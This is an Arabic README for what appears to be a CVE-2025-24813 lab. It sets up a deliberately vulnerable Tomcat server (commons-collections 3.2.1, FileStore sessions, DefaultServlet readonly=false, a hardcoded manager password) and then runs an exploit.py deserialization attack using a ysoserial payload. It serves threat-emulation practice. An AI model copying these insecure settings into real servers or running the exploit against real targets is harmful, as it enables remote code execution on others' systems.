
تعليمات النشر السريع لـ Tomcat v9.0.90 مع java 25.0.1 2025-10-21 LTS على Windows Server 2019 Standard للباحثين الكسالى.
يهدف هذا المستودع إلى توفير إرشادات واضحة للنشر السريع لـ Tomcat v9.0.90 مع java 25.0.1 2025-10-21 LTS على Windows Server 2019 Standard لممارسة محاكاة التهديدات في الأمن السيبراني. يستخدم exploit.py ملف ysoserial-all.jar لإنشاء حمولة باستخدام وحدة CommonsCollections6 في ysoserial-all.jar، والتي يتم إلغاء تسلسلها لاحقًا بواسطة التبعية commons-collections-3.2.1.jar الموجودة في %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib.
Tomcat v9.0.90:Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
java 25.0.1 2025-10-21 LTS (إصدار ZIP):Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
1. انقر على زر "ابدأ"
2. اكتب "edit the system environment variables"
3. أنشئ متغيرين جديدين للنظام باسم
- `%JAVA_HOME%` بقيمة `C:\jdk-25.0.1`
- `%CATALINA_HOME%` بقيمة `C:\apache-tomcat-9.0.90`
4. عدل متغير النظام المسمى `Path`، وأضف القيم التالية:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
tomcat-users.xml في مجلد tomcat-9.0.90\conf وأضف ما يلي قبل </tomcat-users>:<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
context.xml في مجلد tomcat-9.0.90\conf واستبدل كل المحتوى بما يلي:<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
web.xml في مجلد tomcat-9.0.90\conf، ابحث عن DefaultServlet واستبدل كتلة <servlet></servlet> بالكامل بما يلي:<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
shutdown.bat
startup.bat
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
commons-collections-3.2.1.jar، واستمرارية الجلسة عبر FileStore، وتعطيل الحماية من القراءة فقط في DefaultServlet (web.xml)، مما يجعله عرضة لاستغلال CVE-2025-24813 عبر حمولات ysoserial. يمكنك إضافة ملف index.html وهمي في C:\tomcat-9.0.90\webapps\ROOT لجعله يبدو أكثر احترافية.C:\apache-tomcat-9.0.90\conf\web.xml باستخدام المفكرة، وابحث عن "<Connector port=". يمكنك إلغاء تعليق الكتلة وإضافة مسار ملف .pfx الخاص بك. فيما يلي مثال لإضافة ملف cert.pfx في مجلد ssl تم إنشاؤه حديثًا بدون كلمة مرور ويعمل على HTTP/1.1:<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
exploit.pygit clone <this-repo-url>
cd CVE-2025-24813
pip install requests
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
exploit.py، سيتم إنشاء ملفي جلسة في C:\tomcat-9.0.90\webapps\ROOT و C:\tomcat-9.0.90\work\Catalina\localhost\ROOT باسم عشوائي. من المفترض حذف ملف .session داخل مجلد العمل بعد بضع ثوانٍ من التنفيذ.